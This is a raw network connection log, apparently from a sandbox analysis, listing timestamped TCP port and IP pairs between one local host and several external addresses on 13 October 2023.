Oct 13, 2023 15:21:14.751533985 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.751549959 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.751604080 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.751612902 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.751652956 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.753993034 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.754007101 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.754076004 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.754082918 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.754129887 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.755428076 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.755443096 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.755497932 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.755506039 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.755547047 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.757272005 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.757287979 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.757349014 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.757359982 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.757400990 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.759012938 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.759025097 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.759073019 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.759088039 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.759128094 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.761022091 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.761034966 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.761090040 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.761101961 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.761141062 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.762645006 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.762665033 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.762712002 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.762720108 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.762742996 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.762753963 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.763997078 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.764010906 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.764064074 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.764071941 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.764125109 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.765949965 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.765964031 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.766021013 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.766026974 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.766069889 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.767374039 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.767386913 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.767436981 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.767443895 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.767483950 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.768893957 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.768914938 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.768965960 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.768975019 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.768996954 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.769016981 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.770509958 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.770525932 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.770576000 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.770584106 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.770627022 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.772299051 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.772319078 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.772356033 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.772363901 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.772382021 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.772404909 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.774049044 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.774063110 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.774117947 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.774125099 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.774163961 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.775691032 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.775705099 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.775759935 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.775768042 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.775806904 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.797307968 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:21:14.814558983 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:21:14.817698002 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:14.843245983 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:14.844655037 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:14.857536077 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:14.900006056 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:15.076613903 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.076625109 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.076678038 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.076807022 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.076807022 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.076857090 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.076901913 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.077871084 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.077883959 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.078018904 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.078018904 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.078051090 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.079885960 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.079904079 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.080033064 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.080033064 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.080066919 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.080991983 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.081542969 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.081554890 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.081597090 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.081607103 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.081624985 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.083559036 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.083575964 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.083616018 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.083627939 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.083641052 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.085213900 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.085227013 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.085252047 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.085261106 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.085289955 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.085314989 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.087018967 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.087033033 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.087083101 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.087090015 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.087106943 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.087734938 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.089550972 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.089565039 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.089624882 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.089633942 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.089660883 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.089673042 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.092277050 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.092288971 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.092453957 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.092453957 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.092485905 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.092843056 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.094094992 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.094109058 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.094172001 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.094187021 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.094243050 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.095738888 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.095752954 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.095813990 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.095822096 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.095863104 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.097371101 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.097388983 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.097446918 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.097455978 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.097496986 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.098941088 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.098954916 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.099010944 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.099019051 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.099060059 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.100805998 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.100820065 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.100861073 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.100907087 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.100914001 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.101130962 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.102391005 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.102406025 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.102448940 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.102458000 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.102483034 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.102504969 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.104367971 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.104388952 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.104432106 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.104441881 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.104477882 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.106228113 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.106241941 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.106286049 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.106295109 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.106313944 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.106337070 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.107906103 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.107920885 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.107981920 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.107990980 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.108031988 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.109738111 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.109751940 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.109833002 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.109842062 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.109884977 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.111656904 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.111673117 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.111721992 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.111732960 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.111759901 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.111773968 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.113445044 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.113461018 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.113513947 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.113521099 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.113563061 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.114700079 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:15.115185022 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.115216017 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.115250111 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.115257978 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.115283966 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.115309954 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.116923094 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.116939068 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.116991043 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.117000103 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.117013931 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.117042065 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.118622065 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.118638039 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.118700981 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.118716955 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.118767023 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.120496988 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.120513916 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.120563030 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.120573044 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.120589972 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.120610952 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.122176886 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.122195005 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.122252941 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.122261047 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.122307062 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.124003887 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.124018908 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.124067068 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.124074936 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.124092102 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.124735117 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.125605106 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.125626087 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.125663996 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.125672102 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.125689030 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.125716925 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.127445936 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.127460957 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.127502918 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.127509117 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.127536058 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.127549887 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.129091024 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.129105091 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.129163980 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.129170895 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.129210949 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.130899906 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.130922079 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.130953074 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.130959988 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.130990028 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.131006956 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.132620096 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.132632971 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.132682085 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.132690907 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.132704020 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.132730007 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.134460926 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.134474993 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.134599924 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.134608984 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.134658098 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.136176109 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.136190891 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.136256933 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.136265039 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.136305094 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.137847900 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.137860060 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.137923956 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.137932062 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.137974977 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.139514923 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.139529943 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.139589071 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.139597893 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.139640093 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.148125887 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.149425983 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:15.149544954 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:15.159969091 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.159981966 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.160073042 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.160104036 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.160145044 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.164671898 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:15.177500963 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:15.418751001 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:15.421468973 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:15.439018011 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.439026117 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.439062119 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.439199924 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.439201117 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.439249039 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.440459013 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.440479994 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.440545082 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.440557003 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.440615892 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.442400932 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.442418098 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.442472935 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.442485094 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.442500114 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.442523956 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.443881035 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.443898916 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.443953037 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.443960905 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.444004059 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.445707083 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:15.447396040 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.447410107 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.447463036 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.447470903 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.447487116 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.447525978 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.449604034 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.449618101 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.449666977 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.449676991 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.449709892 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.449723959 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.451514959 CEST	443	49736	45.130.41.106	192.168.2.5
